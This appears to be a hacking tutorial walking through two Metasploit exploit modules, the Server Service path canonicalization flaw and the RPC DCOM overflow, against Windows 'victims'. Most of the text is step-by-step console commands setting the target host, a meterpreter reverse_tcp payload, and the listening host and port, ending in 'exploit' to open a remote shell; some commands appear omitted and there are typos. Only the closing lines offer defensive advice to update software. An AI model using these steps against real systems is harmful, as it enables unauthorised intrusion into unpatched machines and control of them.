In this tutorial, I show you a couple of common exploit modules, how to use them, set the variables, and actually exploit. Without further ado, let’s dive in.
#1 Microsoft Server Service Relative Path Stack Corruption.
This module exploits a parsing flaw in “NetAPI32.dll” through the Server Service. This is an old, but still amazingly useful exploit. It can target Windows XP SP2 and Windows XP SP3. It has auto detect target option, so you don’t have worry about which operating system your victim has. It will find out on it’s own.
Let’s try and use it.
Now let’s see what all options we need to set by typing:
We need to set RHost (Remote host). Port is by default set to 445(RPort).
Now input the IP of your victim:
»set rhost 126.96.36.199
Now we need to choose payload. We will use meterpreter payload this time because it’s one of the best payloads out there.(More on this, later on..)
»Set payload windows/meterpreter/reverse_tcp
Type ‘show options’ again. Now it says we need to set lport and lhost. Lhost is your IP address and Lport can be whatever port you want. Put in a random 4 digit number above 1024. For example, below I use 4444.:
»Set lhost 192.168.2.100
»Set lport 4444
Everything is set and now we are ready to engage! Go ahead and simply type ‘exploit’ and if the attack is successful you should see a new meterpreter session open. You are in the system. (What all you can do after this, will come later) [Technical information] This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
#2 RPC DCOM Intergace Overflow
This module exploits a stack buffer overflow in the RPC Service. It can exploit English versions of:
►Windows NT 4.0 SP3
Okay, let’s start. Type:
Now let’s add payload (same as above exploit):
»set payload windows/meterpreter/reverse_tcp
Next, we need to see what options we need to set. Set LHost to match your local IP and RHost to match the victim’s and set Lport to your desired port(4 digit, greater than 1024).
»set lhost 192.168.2.100
»ser rhost 192.168.2.105
»set lport 4444
Now you can type »’exploit’ and if the attack was successful, you will get a meterpreter session.
These were just 2 relatively smooth examples. Metasploit currently has over 1000 different exploits- That’s 1000 exploitable bugs and vulnerabilities that can be used to get into the victim’s computer. Mac OS, Linux and obviously Windows - all have numerous available exploits, any one of which is all we need to get access to the remote system. This just goes to show just how vulnerable almost every piece of software, or even whole operating systems are. With new exploits being discovered by the minute, it is vital to stay on top of the game when it comes to protecting yourself.
One thing anyone can easily do is keep their software and antivirus updated. Among added functionalities and other things these seemingly routine updates for any software or application often carry patches and fixes for the vulnerabilites. (Obviously, any company is not going to proudly announce :”In this version we are releasing a fix for a bug which might have compromised a million systems already. Enjoy!”)